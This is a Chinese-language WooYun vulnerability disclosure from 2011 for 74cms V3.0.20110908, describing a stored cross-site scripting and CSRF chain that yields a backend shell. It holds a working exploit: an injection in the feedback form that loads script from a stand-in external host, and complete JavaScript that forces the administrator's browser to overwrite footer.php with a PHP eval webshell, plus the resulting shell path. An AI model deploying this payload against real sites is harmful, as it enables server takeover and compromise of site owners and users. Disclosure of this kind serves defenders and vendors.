漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2011-03071
漏洞标题:骑士CMS(74cms) CSRF 后台 getshell
相关厂商:骑士CMS(74cms)
漏洞作者: 路人甲
提交时间:2011-10-21 19:16
修复时间:2011-10-21 20:27
公开时间:2011-10-21 20:27
漏洞类型:CSRF
危害等级:高
自评Rank:10
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2011-10-21: 积极联系厂商并且等待厂商认领中,细节不对外公开
2011-10-21: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
详细说明:
官方网站:http://www.74cms.com/
影响版本:74cms V3.0.20110908
Author:insight
漏洞详细:
注册用户-->会员中心-->意见建议-->提交意见内容 1">1<script src="http://xxx.com/x.js"></script>1 --> 等待管理员登录
管理员登录-->查看 "待回复的意见/建议" --> .....
js内容:
var Shelldata='tpl_content=%3C%3Fphp%20eval%28%24_POST%5Bxdxd%5D%29%3F%3E&tpl_dir=default&tpl_name=footer.php&del_Submit=%B1%A3%B4%E6'; try{ var xml = window.XMLHttpRequest ? (new XMLHttpRequest()) : (new ActiveXObject('Microsoft.XMLHTTP')); xml.open("POST",'admin_templates.php?act=do_edit',false); xml.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); xml.onreadystatechange = function(){if(xml.readyState == 4){}}; xml.send(Shelldata); }catch(e){}
shell地址:http://site.com/74cmsv3/templates/default/footer.php
漏洞证明:
修复方案:
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝